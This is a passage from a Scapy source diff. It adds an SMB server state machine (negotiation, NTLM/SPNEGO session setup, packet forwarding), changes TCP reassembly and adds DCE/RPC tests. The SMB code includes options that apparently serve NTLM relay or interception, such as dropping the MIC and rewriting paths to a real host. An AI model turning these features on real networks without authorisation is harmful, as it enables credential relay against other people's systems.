self.CLIENT_PROVIDES_NEGOEX: + negoex_token, _, _, _ = self.get_token(negoex=True) + else: + negoex_token = None + if not self.SMB2 and not self.get("GUID", 0): + self.EXTENDED_SECURITY = False + # Build negotiate response + DialectIndex = None + DialectRevision = None + if SMB2_Negotiate_Protocol_Request in pkt: + # SMB2 + DialectRevisions = pkt[SMB2_Negotiate_Protocol_Request].Dialects + DialectRevisions.sort() + DialectRevision = DialectRevisions[0] + if DialectRevision >= 0x300: # SMB3 + raise ValueError("SMB client requires SMB3 which is unimplemented.") + else: + DialectIndexes = [ + x.DialectString for x in pkt[SMBNegotiate_Request].Dialects + ] + if self.ALLOW_SMB2: + # Find a value matching SMB2, fallback to SMB1 + for key, rev in [(b"SMB 2.???", 0x02FF), (b"SMB 2.002", 0x0202)]: + try: + DialectIndex = DialectIndexes.index(key) + DialectRevision = rev + self.SMB2 = True + break + except ValueError: + pass + else: + DialectIndex = DialectIndexes.index(b"NT LM 0.12") + else: + # Enforce SMB1 + DialectIndex = DialectIndexes.index(b"NT LM 0.12") + if DialectRevision and DialectRevision & 0xFF != 0xFF: + # Version isn't SMB X.??? + self.Dialect = DialectRevision + cls = None + if self.SMB2: + # SMB2 + cls = SMB2_Negotiate_Protocol_Response + self.smb_header = NBTSession() / SMB2_Header( + CreditsRequested=1, + CreditCharge=1, + ) + if SMB2_Negotiate_Protocol_Request in pkt: + self.smb_header.MID = pkt.MID + self.smb_header.TID = pkt.TID + self.smb_header.AsyncId = pkt.AsyncId + self.smb_header.SessionId = pkt.SessionId + else: + # SMB1 + self.smb_header = NBTSession() / SMB_Header( + Flags="REPLY+CASE_INSENSITIVE+CANONICALIZED_PATHS", + Flags2=( + "LONG_NAMES+EAS+NT_STATUS+SMB_SECURITY_SIGNATURE+" + "UNICODE+EXTENDED_SECURITY" + ), + TID=pkt.TID, + MID=pkt.MID, + UID=pkt.UID, + PIDLow=pkt.PIDLow, + ) + if self.EXTENDED_SECURITY: + cls = SMBNegotiate_Response_Extended_Security + else: + cls = SMBNegotiate_Response_Security + if self.SMB2: + # SMB2 + resp = self.smb_header.copy() / cls( + DialectRevision=DialectRevision, + SecurityMode=3 + if self.REQUIRE_SIGNATURE + else self.get("SecurityMode", bool(self.IDENTITIES)), + ServerTime=self.get("ServerTime", time.time() + 11644473600), + ServerStartTime=0, + MaxTransactionSize=65536, + MaxReadSize=65536, + MaxWriteSize=65536, + ) + else: + # SMB1 + resp = self.smb_header.copy() / cls( + DialectIndex=DialectIndex, + ServerCapabilities=( + "UNICODE+LARGE_FILES+NT_SMBS+RPC_REMOTE_APIS+STATUS32+" + "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" + "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" + ), + SecurityMode=( + 3 + if self.REQUIRE_SIGNATURE + else self.get("SecurityMode", bool(self.IDENTITIES)) + ), + ServerTime=self.get("ServerTime"), + ServerTimeZone=self.get("ServerTimeZone"), + ) + if self.EXTENDED_SECURITY: + resp.ServerCapabilities += "EXTENDED_SECURITY" + if self.EXTENDED_SECURITY or self.SMB2: + # Extended SMB1 / SMB2 + # Add security blob + resp.SecurityBlob = GSSAPI_BLOB( + innerContextToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit( + mechTypes=[ + # NEGOEX - Optional. See below + # NTLMSSP + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10") + ], + ) + ) + ) + self.GUID = resp.GUID = self.get("GUID", RandUUID()._fix()) + if self.PASS_NEGOEX: # NEGOEX handling + # NOTE: NegoEX has an effect on how the SecurityContext is + # initialized, as detailed in [MS-AUTHSOD] sect 3.3.2 + # But the format that the Exchange token uses appears not to + # be documented :/ + resp.SecurityBlob.innerContextToken.token.mechTypes.insert( + 0, + # NEGOEX + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.30"), + ) + resp.SecurityBlob.innerContextToken.token.mechToken = SPNEGO_Token( + value=negoex_token + ) # noqa: E501 + else: + # Non-extended SMB1 + resp.Challenge = self.get("Challenge") + resp.DomainName = self.get("DomainName") + resp.ServerName = self.get("ServerName") + resp.Flags2 -= "EXTENDED_SECURITY" + if not self.SMB2: + resp[SMB_Header].Flags2 = ( + resp[SMB_Header].Flags2 - + "SMB_SECURITY_SIGNATURE" + + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + ) + self.send(resp) + + @ATMT.state() + def NEGOTIATED(self): + pass + + @ATMT.receive_condition(NEGOTIATED) + def received_negotiate_smb2(self, pkt): + if SMB2_Negotiate_Protocol_Request in pkt: + raise self.NEGOTIATED().action_parameters(pkt) + + @ATMT.action(received_negotiate_smb2) + def on_negotiate_smb2(self, pkt): + self.on_negotiate(pkt) + + @ATMT.receive_condition(NEGOTIATED) + def receive_setup_andx_request(self, pkt): + if ( + SMBSession_Setup_AndX_Request_Extended_Security in pkt or + SMBSession_Setup_AndX_Request in pkt + ): + # SMB1 + if SMBSession_Setup_AndX_Request_Extended_Security in pkt: + # Extended + ntlm_tuple = self._get_token(pkt.SecurityBlob) + else: + # Non-extended + self.set_cli("AccountName", pkt.AccountName) + self.set_cli("PrimaryDomain", pkt.PrimaryDomain) + self.set_cli("Path", pkt.Path) + self.set_cli("Service", pkt.Service) + ntlm_tuple = self._get_token( + pkt[SMBSession_Setup_AndX_Request].UnicodePassword + ) + self.set_cli("VCNumber", pkt.VCNumber) + self.set_cli("SecuritySignature", pkt.SecuritySignature) + self.set_cli("UID", pkt.UID) + self.set_cli("MID", pkt.MID) + self.set_cli("TID", pkt.TID) + self.received_ntlm_token(ntlm_tuple) + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + elif SMB2_Session_Setup_Request in pkt: + # SMB2 + ntlm_tuple = self._get_token(pkt.SecurityBlob) + self.set_cli("SecuritySignature", pkt.SecuritySignature) + self.set_cli("MID", pkt.MID) + self.set_cli("TID", pkt.TID) + self.set_cli("AsyncId", pkt.AsyncId) + self.set_cli("SessionId", pkt.SessionId) + self.set_cli("SecurityMode", pkt.SecurityMode) + self.received_ntlm_token(ntlm_tuple) + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + + @ATMT.state() + def RECEIVED_SETUP_ANDX_REQUEST(self): + pass + + @ATMT.action(receive_setup_andx_request) + def on_setup_andx_request(self, pkt): + ntlm_token, negResult, MIC, rawToken = ntlm_tuple = self.get_token() + # rawToken == whether the GSSAPI ASN.1 wrapper is used + # typically, when a SMB session **falls back** to NTLM, no + # wrapper is used + if ( + SMBSession_Setup_AndX_Request_Extended_Security in pkt or + SMBSession_Setup_AndX_Request in pkt or + SMB2_Session_Setup_Request in pkt + ): + if SMB2_Session_Setup_Request in pkt: + # SMB2 + self.smb_header.MID = self.get("MID", self.smb_header.MID + 1) + self.smb_header.TID = self.get("TID", self.smb_header.TID) + if self.smb_header.Flags.SMB2_FLAGS_ASYNC_COMMAND: + self.smb_header.AsyncId = self.get( + "AsyncId", self.smb_header.AsyncId + ) + self.smb_header.SessionId = self.get("SessionId", 0x0001000000000015) + else: + # SMB1 + self.smb_header.UID = self.get("UID") + self.smb_header.MID = self.get("MID") + self.smb_header.TID = self.get("TID") + if ntlm_tuple == (None, None, None, None): + # Error + if SMB2_Session_Setup_Request in pkt: + # SMB2 + resp = self.smb_header.copy() / SMB2_Session_Setup_Response() + else: + # SMB1 + resp = self.smb_header.copy() / SMBSession_Null() + resp.Status = self.get("Status", 0xC000006D) + else: + # Negotiation + if ( + SMBSession_Setup_AndX_Request_Extended_Security in pkt or + SMB2_Session_Setup_Request in pkt + ): + # SMB1 extended / SMB2 + if SMB2_Session_Setup_Request in pkt: + # SMB2 + resp = self.smb_header.copy() / SMB2_Session_Setup_Response() + if self.GUEST_LOGIN: + resp.SessionFlags = "IS_GUEST" + if self.ANONYMOUS_LOGIN: + resp.SessionFlags = "IS_NULL" + else: + # SMB1 extended + resp = ( + self.smb_header.copy() / + SMBSession_Setup_AndX_Response_Extended_Security( + NativeOS=self.get("NativeOS"), + NativeLanMan=self.get("NativeLanMan"), + ) + ) + if self.GUEST_LOGIN: + resp.Action = "SMB_SETUP_GUEST" + if not ntlm_token: + # No token (e.g. accepted) + resp.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=negResult, + ) + ) + if MIC and not self.DROP_MIC: # Drop the MIC? + resp.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( + value=MIC + ) # noqa: E501 + if negResult == 0: + self.authenticated = True + elif isinstance(ntlm_token, NTLM_CHALLENGE) and not rawToken: + resp.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=negResult or 1, + supportedMech=SPNEGO_MechType( + # NTLMSSP + oid="1.3.6.1.4.1.311.2.2.10" + ), + responseToken=SPNEGO_Token(value=ntlm_token), + ) + ) + else: + # Token is raw or unknown + resp.SecurityBlob = ntlm_token + elif SMBSession_Setup_AndX_Request in pkt: + # Non-extended + resp = self.smb_header.copy() / SMBSession_Setup_AndX_Response( + NativeOS=self.get("NativeOS"), + NativeLanMan=self.get("NativeLanMan"), + ) + resp.Status = self.get( + "Status", 0x0 if self.authenticated else 0xC0000016 + ) + self.send(resp) + + @ATMT.condition(RECEIVED_SETUP_ANDX_REQUEST) + def wait_for_next_request(self): + if self.authenticated: + raise self.AUTHENTICATED() + else: + raise self.NEGOTIATED() + + @ATMT.state() + def AUTHENTICATED(self): + """Dev: overload this""" + pass + + @ATMT.condition(AUTHENTICATED, prio=1) + def should_end(self): + if not self.ECHO: + # Close connection + raise self.END() + + @ATMT.receive_condition(AUTHENTICATED, prio=2) + def receive_packet_echo(self, pkt): + if self.ECHO: + raise self.AUTHENTICATED().action_parameters(pkt) + + def _ioctl_error(self, Status="STATUS_NOT_SUPPORTED"): + pkt = self.smb_header.copy() / SMB2_Error_Response(ErrorData=b"\xff") + pkt.Status = Status + pkt.Command = "SMB2_IOCTL" + self.send(pkt) + + @ATMT.action(receive_packet_echo) + def pass_packet(self, pkt): + # Pre-process some of the data if possible + pkt.show() + if not self.SMB2: + # SMB1 - no signature (disabled by our implementation) + if SMBTree_Connect_AndX in pkt and self.REAL_HOSTNAME: + pkt.LENGTH = None + pkt.ByteCount = None + pkt.Path = ( + "\\\\%s\\" % self.REAL_HOSTNAME + pkt.Path[2:].split("\\", 1)[1] + ) + else: + self.smb_header.MID += 1 + # SMB2 + if SMB2_IOCTL_Request in pkt and pkt.CtlCode == 0x00140204: + # FSCTL_VALIDATE_NEGOTIATE_INFO + # This is a security measure asking the server to validate + # what flags were negotiated during the SMBNegotiate exchange. + # This packet is ALWAYS signed, and expects a signed response. + + # https://docs.microsoft.com/en-us/archive/blogs/openspecification/smb3-secure-dialect-negotiation + # > "Down-level servers (pre-Windows 2012) will return + # > STATUS_NOT_SUPPORTED or STATUS_INVALID_DEVICE_REQUEST + # > since they do not allow or implement + # > FSCTL_VALIDATE_NEGOTIATE_INFO. + # > The client should accept the + # > response provided it's properly signed". + + if self.SigningSessionKey: + # We have the session key ! + pkt = self.smb_header.copy() / SMB2_IOCTL_Response( + CtlCode=0x00140204, + FileId=pkt[SMB2_IOCTL_Request].FileId, + Buffer=[ + ( + "Output", + SMB2_IOCTL_Validate_Negotiate_Info_Response( + GUID=self.GUID, + DialectRevision=self.Dialect, + SecurityMode=3 + if self.REQUIRE_SIGNATURE + else self.get( + "SecurityMode", bool(self.IDENTITIES) + ), + ), + ) + ], + ) + else: + # Since we can't sign the response, modern clients will abort + # the connection after receiving this, despite our best + # efforts... + self._ioctl_error() + return + self.echo(pkt) + + @ATMT.state(final=1) + def END(self): + self.end() diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 70a2f0c3ca4..887a024a078 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1085,7 +1085,7 @@ def mysummary(self): getattr(self, "_name", self.name)) @classmethod - def tcp_reassemble(cls, data, metadata): + def tcp_reassemble(cls, data, metadata, session): # Used with TLSSession from scapy.layers.tls.record import TLS from scapy.layers.tls.record_tls13 import TLS13 @@ -1096,8 +1096,7 @@ def tcp_reassemble(cls, data, metadata): elif len(data) > length: pkt = cls(data) if hasattr(pkt.payload, "tcp_reassemble"): - if pkt.payload.tcp_reassemble(data[length:], metadata): - return pkt + return pkt.payload.tcp_reassemble(data[length:], metadata, session) else: return pkt else: diff --git a/scapy/packet.py b/scapy/packet.py index c0e806bace4..7483f215941 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -401,6 +401,7 @@ def copy(self): clone.default_fields = self.copy_fields_dict(self.default_fields) clone.overloaded_fields = self.overloaded_fields.copy() clone.underlayer = self.underlayer + clone.parent = self.parent clone.explicit = self.explicit clone.raw_packet_cache = self.raw_packet_cache clone.raw_packet_cache_fields = self.copy_fields_dict( @@ -1084,6 +1085,7 @@ def clone_with(self, payload=None, **kargs): pkt.overloaded_fields = self.overloaded_fields.copy() pkt.time = self.time pkt.underlayer = self.underlayer + pkt.parent = self.parent pkt.post_transforms = self.post_transforms pkt.raw_packet_cache = self.raw_packet_cache pkt.raw_packet_cache_fields = self.copy_fields_dict( diff --git a/scapy/sessions.py b/scapy/sessions.py index 015cb7502d3..e4ccb86384c 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -7,10 +7,14 @@ """ from collections import defaultdict -from scapy.compat import raw +import socket +import struct + +from scapy.compat import raw, orb from scapy.config import conf from scapy.packet import NoPayload, Packet from scapy.plist import PacketList +from scapy.pton_ntop import inet_pton # Typing imports from scapy.compat import ( @@ -165,6 +169,7 @@ class StringBuffer(object): If a TCP fragment is missed, this class will fill the missing space with zeros. """ + def __init__(self): # type: () -> None self.content = bytearray(b"") @@ -222,9 +227,12 @@ class TCPSession(IPSession): DEV: implement a class-function `tcp_reassemble` in your Packet class:: @classmethod - def tcp_reassemble(cls, data, metadata): + def tcp_reassemble(cls, data, metadata, session): # data = the reassembled data from the same request/flow # metadata = empty dictionary, that can be used to store data + # during TCP reassembly + # session = a dictionary proper to the bidirectional TCP session, + # that can be used to store anything [...] # If the packet is available, return it. Otherwise don't. # Whenever you return a packet, the buffer will be discarded. @@ -241,9 +249,6 @@ def tcp_reassemble(cls, data, metadata): TCP socket. Default to False """ - fmt = ('TCP {IP:%IP.src%}{IPv6:%IPv6.src%}:%r,TCP.sport% > ' + - '{IP:%IP.dst%}{IPv6:%IPv6.dst%}:%r,TCP.dport%') - def __init__(self, app=False, *args, **kwargs): # type: (bool, *Any, **Any) -> None super(TCPSession, self).__init__(*args, **kwargs) @@ -251,12 +256,32 @@ def __init__(self, app=False, *args, **kwargs): if app: self.data = b"" self.metadata = {} # type: Dict[str, Any] + self.session = {} # type: Dict[str, Any] else: # The StringBuffer() is used to build a global # string from fragments and their seq nulber self.tcp_frags = defaultdict( lambda: (StringBuffer(), {}) - ) # type: DefaultDict[str, Tuple[StringBuffer, Dict[str, Any]]] + ) # type: DefaultDict[bytes, Tuple[StringBuffer, Dict[str, Any]]] + self.tcp_sessions = defaultdict( + dict + ) # type: DefaultDict[bytes, Dict[str, Any]] + + def _get_ident(self, pkt, session=False): + # type: (Packet, bool) -> bytes + underlayer = pkt["TCP"].underlayer + af = socket.AF_INET6 if "IPv6" in pkt else socket.AF_INET + src = underlayer and inet_pton(af, underlayer.src) or b"" + dst = underlayer and inet_pton(af, underlayer.dst) or b"" + if session: + # Bidirectional + def xor(x, y): + # type: (bytes, bytes) -> bytes + return bytes(orb(a) ^ orb(b) for a, b in zip(x, y)) + return struct.pack("!4sH", xor(src, dst), pkt.dport ^ pkt.sport) + else: + # Uni-directional + return src + dst + struct.pack("!HH", pkt.dport, pkt.sport) def _process_packet(self, pkt): # type: (Packet) -> Optional[Packet] @@ -271,7 +296,7 @@ def _process_packet(self, pkt): # when a packet ends. return pkt self.data += bytes(pkt) - pkt = pay_class.tcp_reassemble(self.data, self.metadata) + pkt = pay_class.tcp_reassemble(self.data, self.metadata, self.session) if pkt: self.data = b"" self.metadata = {} @@ -285,10 +310,11 @@ def _process_packet(self, pkt): if isinstance(pay, (NoPayload, conf.padding_layer)): return pkt new_data = pay.original - # Match packets by a uniqute TCP identifier + # Match packets by a unique TCP identifier seq = pkt[TCP].seq - ident = pkt.sprintf(self.fmt) + ident = self._get_ident(pkt) data, metadata = self.tcp_frags[ident] + tcp_session = self.tcp_sessions[self._get_ident(pkt, True)] # Let's guess which class is going to be used if "pay_class" not in metadata: pay_class = pay.__class__ @@ -300,9 +326,10 @@ def _process_packet(self, pkt): return pkt metadata["pay_class"] = pay_class metadata["tcp_reassemble"] = tcp_reassemble - metadata["seq"] = seq else: tcp_reassemble = metadata["tcp_reassemble"] + if "seq" not in metadata: + metadata["seq"] = seq # Get a relative sequence number for a storage purpose relative_seq = metadata.get("relative_seq", None) if relative_seq is None: @@ -324,14 +351,17 @@ def _process_packet(self, pkt): packet = None # type: Optional[Packet] if data.full(): # Reassemble using all previous packets - packet = tcp_reassemble(bytes(data), metadata) + packet = tcp_reassemble(bytes(data), metadata, tcp_session) # Stack the result on top of the previous frames if packet: if "seq" in metadata: pkt[TCP].seq = metadata["seq"] + # Clear buffer data.clear() + # Clear TCP reassembly metadata metadata.clear() del self.tcp_frags[ident] + # Rebuild resulting packet pay.underlayer.remove_payload() if IP in pkt: pkt[IP].len = None diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index c0e09012fda..444768f94c5 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -542,10 +542,7 @@ p = DceRpc4() / PNIOServiceReqPDU(blocks=[ ]) s = bytes(p) # Remove the random UUID part before comparison -s[:18] + s[24:] == \ - bytearray.fromhex('0400000000000000dea000006c9711d18271' + 'dea000016c9711d1827100a02442df7d000000000000000000000000000000000000000000000001000000000000ffffffff001c00000000' + \ - '0000000800000008000000080000000000000008' + - '0000000401000102') +assert s[:18] + s[24:] == b'\x04\x00\x00\x00\x10\x00\x00\x00\x00\x00\xa0\xde\x97l\xd1\x11\x82q\x01\x00\xa0\xde\x97l\xd1\x11\x82q\x00\xa0$B\xdf}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x1c\x00\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x04\x01\x00\x01\x02' = PNIOServiceReqPDU dissection p = DceRpc4( @@ -572,10 +569,7 @@ p = DceRpc4() / PNIOServiceResPDU(blocks=[ ]) s = bytes(p) # Remove the random UUID part before comparison -s[:18] + s[24:] == \ - bytearray.fromhex('0402000000000000dea000006c9711d18271' + 'dea000026c9711d1827100a02442df7d000000000000000000000000000000000000000000000001000000000000ffffffff001c00000000' + \ - '0000000000000008000000080000000000000008' + \ - '0000000401000102') +assert s[:18] + s[24:] == b'\x04\x02\x00\x00\x10\x00\x00\x00\x00\x00\xa0\xde\x97l\xd1\x11\x82q\x02\x00\xa0\xde\x97l\xd1\x11\x82q\x00\xa0$B\xdf}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x04\x01\x00\x01\x02' = PNIOServiceResPDU dissection p = DceRpc4( diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 466f744ec85..5df7edfdde0 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -79,13 +79,52 @@ assert pkt.auth_verifier is None assert pkt[DceRpc5Request].alloc_hint == 132 assert pkt[DceRpc5Request].opnum == 3 += Dissect DCE/RPC v5 Bind request with NETLOGON secure channel + +pkt = DceRpc(b'\x05\x00\x0b\x07\x10\x00\x00\x00\xe4\x00<\x00\x02\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00\x01\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00\x02\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00,\x1c\xb7l\x12\x98@E\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00D\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00APPS2019\x00APPS2019-RODC\x00\x08apps2019\x03lab\x00\rAPPS2019-RODC\x00') + +assert pkt.auth_verifier.auth_value.NetbiosDomainName == b"APPS2019" +assert pkt.auth_verifier.auth_value.DnsDomainName == b"apps2019.lab." + +assert pkt.n_context_elem == 3 +assert pkt[DceRpc5Bind].context_elem[0].transfer_syntaxes[0].sprintf("%if_uuid%") == 'NDR 2.0' +assert pkt[DceRpc5Bind].context_elem[1].transfer_syntaxes[0].sprintf("%if_uuid%") == 'NDR64' +assert pkt[DceRpc5Bind].context_elem[2].transfer_syntaxes[0].sprintf("%if_uuid%") == 'Bind Time Feature Negotiation' + += Dissect DCE/RPC v5 Bind Response with NETLOGON secure channel + +pkt = DceRpc(b'\x05\x00\x0c\x07\x10\x00\x00\x00\x80\x00\x0c\x00\x02\x00\x00\x00\xd0\x16\xd0\x16=F\x00\x00\x06\x0049676\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x06\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert pkt[DceRpc5BindAck].sec_addr.port_spec == b'49676\x00' +assert pkt[DceRpc5BindAck].results[1].result == 0 +assert pkt[DceRpc5BindAck].results[1].transfer_syntax.sprintf("%if_uuid%") == 'NDR64' + += Dissect DCE/RPC v5 Response with NETLOGON secure channel + +pkt = DceRpc(b'\x05\x00\x02\x03\x10\x00\x00\x00\x98\x038\x00\x02\x00\x00\x004\x03\x00\x00\x01\x00\x00\x00\x88\xd6k\xac\xab^\xafqA^\xee\x8e\xce\x16\x86i\xe5A\xafK#\xeb%\'l\x88\xd4A\x0f\xa6>\xaf\xed\xf65\xf0\xf9\xf25\x89\xf5\xc5r\xe6;t\xf5\x80 \x80~\xf6\x0cRQ\x0b\xea\xc2}\x8a>\x08\xc9\x04\x9c\xdcOj\xa3\x0c\x82~\xfe\xa6\xa3\x01^ \xee\xd3\xd2yf\xfa\xfbL\xec&\x8b60\xb9\x83j\x84\xa0\xbc*G\xe25\x1a\r\xf3\xc8\xa6ib9\x87\xcbt%\x17\xf8g\x17\x1cIR\xd5\'wW\xbedZbXv\xb7\xe5?#$(\xae\x06\x9e\xce\xe1K\xd9\'\x9fG\xde\xff\xc9j\xd7\xa4\x04\xcb]-\xbcr\xb9+\xdax\xee\xa3\xce\x9c\x15\x0c/\xb2\xcb\xaaF\t\x07/AQM\x18t\xdc\xea\x019\x11TOy\xf7\x7f\xd1\x87\xc7m\xea>\x84Y\xc3\xef\xd0\xa6e\xb0g\xc3\x12\xd9\xc4~$\xb8\xfc/0\x86\x0e0\x8c`5lU\xd1\xbf8\xd2\xcb\xb1%\xfa\xfabr\x10\x9a\xf8\xb7\xb1\x01$wU\x17r\x03Z\xdc\xdd^\xecU\xc1\xf1\x87\xad\xa1\xea\xd8\xf2\x82\xa8\x95\xd4\xd2\xc6\x8e\xf1\xcfN1k\xdc\xc3\xf7o]q\'a\xa3Y\r97\xfe.8O\xf9\xa7\x93\xd3\x99?K\x8bv.\xac=t\r\xba\xca\xd0\x82\xd8\x81\xaf\xe6cv\xbe\xcbN\x93\x9d\x0e\xd4\x119d\x83/u\xc8\xb2\x1c/q\xf0"\xc4\x04\xadB\xe3N\xed\xbbR\xc4yO\x1fQ\xdd}\xd2\xe3c\x1e\xec\xc7\xc4\xf8\xf6OV\xe5\x00*\xb0\t\xbd\xf0\xe5j\xbf\xa3\xe0\x85\xa0\x81\xc6\xb96\xb9\xec\xd7I\x16_\xe7K\xb2D\xad\xb5\x7fG\xb9\x9by\xe2\xd9\xcf\xe7J\x83Y-\xa7:\xa3\x16\xe7\xce\xf9\xf5\xeb\x88z&Je\xcb\x94\'\xdc?\xbf\xed!\x1a\xb3sI\xb5o\x00\x8dJ\xd9\xed\x160+\x11nD\xd0QIo]A\xc0\x89\xa8\xb2\xc9\xb6\xc7,\xf0V\x8a\xae\xa6\x97\x8e\x91tO\x8c\x94\x08\xf1ru\x87e\x0bq6\x8aZ\xb9\xf3\xb7\xbb\xaf;\x89\xdf\x8b\xbf\tA\xef\xe3\x07\x0fT\xed\xbb\x072\x8eQ\xf4\xce\x194A\\w\xb4\x88\xff[\xcf\x91N\x1b\xfb\xe3\xcb~\xe9\xfc\x195\x0f&96\x05\x9a\xe4\xc0~\xd9\x0b\xfd\xbc\xc9\x8fTXY\x9f\xe4\x87e!\x93$$\x0b\xfc\xe7Jm8\x18\xb5\xad\xff\x85\xc3\xe2%\xd5{\x8bs\xa7\xb0\x1e\x0ei\xfc\xc2\x9d\x95\xd4\x83\xba"\x80\xee7^\xda\x02\x8b\x01\'\xe5e\x18\xa9}i\xbe\x86\xf4\x93\x9c\xe6\xe5\xf3\xd2\xa8\x8dH\\\x14\x89+yc\xa7kZ\x80\xe0\xb1\xc3\xd1\xa5\x8a9\xd9\xe7\x8d\xfd\x90\x04B\xce0\xeaK\xa1\xbc\xc1*\x8a\xfd*oX\xa0\x8b\x04D\xbc\x87\xacH\x97\x89\x85\xb2b\xf4F\xa2\xf1m\x06\xfe\x01\xd2\xcbT\x01+\x89<\x05q0ibL\x99[C\xeb\xcfx#i4\x8b\xbb\xb5ZP\x12?\x8b\xa5\x0e\x91"@aJ\t\t\x86\xa5*\t\xbf\x01Q\xa5\x85y\xad\xc0\xa7\xb2l5R\xd4\x85\xf4\xab\n\t\rJb\xf2\x875\xfcL\x16\xb0e\x17\xe1\xdc<\xd1\xee\x86\x01\xefHD\x1eb\xd1\xd1\xbby\xd41\xb7#\xef$DN\xda)\x8f\xb9\xffEa\xfe\xd8C\xb9\xff}\x85ra\xca\xec\xe1\xf6\x99\t\xa1\xc9H\x97\xd7\xc2\xa7\xbbW_\x1a\x92\xed\xb7\xde\xba*\r\x1e%h\xbdu)/\xd8m\xc0\xa9\xfb\xa1\xb5\xa3\xc3\x81\x18\xcd6\xd8t\x06\xa7\xd8\x84\xf5\x80\xb3\xaaX&\x8a\x7fPZ\x04\xcbsn.,b\xdfW\xd0\x7f\xc5\xc90 \x95S\x13*42R\x16fY\xeb\xd2\x05\xbd\x18Wm\xc0\xa1\x9dpYk\xaa\xd9\xd9+\x030\x9a\xe4IMlbfL\x81\xef[H]\xc6:\x88\x9cjE\x11\xce%\xd6\xe2<\x7f\xaaDO\x06\xaf\x13g&FX\x05\x90\xefl\x14\x12P;\xdc\xe7N\x0fU1C\xd1u#\xca\xf9\x12\xe6\xf7\x1bT\x17z\x97\xf2\xf5GH\xe3e\xbe\xe0\xeb?\xc2u\x9e#\x1c\xed\xcf7\x04c\x14\x90\xfc\x07\x1b\xedX\x1a\xd4\xbf\x96T\xee\xe7\x01^@\xcfSG\xd5\x899\x01\xf9\xc3\xf3(\xc2?^\xcd[,\xd85*\xdd\xab\xb6t\xc7p\xc4\xd3\x95\x9d\x02 \x9a^\x81\xb1.y\x9d\xc8\xe7\xb46\xfc\xc7,\x9fI\x03\\R\x83Y3+\xa7\x1f\x00\xd0\x16J\x10\x9a\xc5\'9)\xab\x93\x05\xd7\xb6\x12\xde \r\xc5b\x8bKo36\xfej\xa7\t\xd1{}a\x7f\xa4\xc3\xdc\xaaA\xe5\xe3\x91Uzw\xb2w\xee^\xcd\xd0i\xb7\xc0\xff`D\x06\x04\x00\x00\x00\x00\x00\x13\x00\x1a\x00\xff\xff\x00\x00\xb6\xb0D"\x11h\x92_\xe2 +\x06b%\x7f\xf5\x87O\x00\x08\x81\ro\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert len(pkt.auth_pad) == 4 +assert pkt.auth_verifier.auth_pad_length == 4 + +pkt.auth_pad = None +pkt.auth_verifier.auth_pad_length = None +pkt = DceRpc(bytes(pkt)) +assert len(pkt.auth_pad) == 4 +assert pkt.auth_verifier.auth_pad_length == 4 + + Check DCE/RPC 4 layer = DCE/RPC default values -bytes(DceRpc4()) == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff000000000000') +assert bytes(DceRpc4()) == 